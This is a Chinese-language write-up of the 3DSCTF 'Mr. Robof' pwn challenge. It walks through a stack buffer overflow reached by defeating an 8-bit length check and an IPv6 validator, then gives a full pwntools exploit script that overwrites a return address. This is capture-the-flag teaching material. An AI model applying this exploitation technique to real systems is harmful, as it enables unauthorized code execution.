3DSCTF PWN —— Mr. Robof

竟然没任何保护

1
2
3
4
5
6
7
# checksec ./020d04ea8f10ac07c5b83f3d0910108b 
[*] '/root/learn/3DSCTF/Robof/020d04ea8f10ac07c5b83f3d0910108b'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)

基本上这种情形就是执行shellcode

漏洞在storeCheckedIP,只要绕过ip检查即可进入这里

1
2
3
4
5
6
7
8
int __cdecl storeCheckedIP(char *src)
{
char dest; // [sp+8h] [bp-30h]@1

strcpy(&dest, src);
puts("// TODO - Finish later...");
return 1;
}

这两个检查是validateSize和validateIP

1
2
v6 = validateSize(&s);
v5 = validateIP(&s);

size是大于1,小于0x28,这个strlen只要00截断即可,但是上面的strcpy也是00截断,这个肯定不行的,结果一看这个v2是8位unsigned整形,可以整数溢出啊

1
2
3
4
5
6
7
8
_BOOL4 __cdecl validateSize(char *s)
{
unsigned __int8 v2; // [sp+2Fh] [bp-9h]@1

_x86_get_pc_thunk_ax();
v2 = strlen(s);
return v2 > 1u && v2 <= 0x28u;
}

检测ip的(其中inet_pton是将“点分十进制” -> “二进制整数”)
但是这里遇到.就直接返回了,这个就棘手了
后来发现10是ipv6的地址,汗~

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
int __cdecl validateIP(int input)
{
char *v1; // [email protected]
char cp[41]; // [sp+7h] [bp-51h]@3
int v4; // [sp+38h] [bp-20h]@6
int i; // [sp+4Ch] [bp-Ch]@1

v1 = (char *)_x86_get_pc_thunk_ax() + 6430;
for ( i = 0; i <= 40; ++i )
{
if ( *(_BYTE *)(i + input) == '.' )
{
cp[i] = 0;
return inet_pton(10, cp, &v4);
}
cp[i] = *(_BYTE *)(i + input);
}
return inet_pton(10, cp, &v4);
}

ip示例

1
2
3
4
# ./020d04ea8f10ac07c5b83f3d0910108b 
0:0:0:0:0:0:0:0
-> Valid IP
// TODO - Finish later...

而且ip那里特意给了个.截断,最终exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# -*- coding: utf-8 -*-
from pwn import *

p = process("./020d04ea8f10ac07c5b83f3d0910108b")
readips = 0x08048819
padding = "a" * 36
trueipv6 = "0:0:0:0:0:0:0:0"
payload = trueipv6 + "\x2e" + padding
payload += p32(readips)
payload += "a" * (270 - len(payload))

p.sendline(payload)

p.interactive()
自愿打赏专区